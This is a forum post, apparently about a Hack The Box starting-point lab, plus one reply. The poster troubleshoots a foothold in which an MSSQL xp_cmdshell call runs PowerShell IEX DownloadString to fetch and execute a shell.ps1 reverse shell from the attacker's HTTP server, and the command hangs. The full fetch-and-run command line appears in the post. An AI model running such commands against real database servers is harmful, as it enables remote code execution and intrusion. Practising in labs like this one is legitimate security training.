Starting point Foothold

okay..

im listening on port 80

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.27 - - [01/Jul/2020 17:24:12] "GET /shell.ps1 HTTP/1.1" 200 -

my other terminal in SQL to pull the shell.ps1

Press help for extra shell commands
SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.163/shell.ps1\");"

the problem is the SQL xp_cmdshell command is waiting foreevr
nothing retunred

Comments

  • I'm facing the same issue. Response is 200, netcat sees the connection from 10.10.10.27, but nothing is returned in the SQL prompt.

    Did you manage to find out anything new?

Sign In to comment.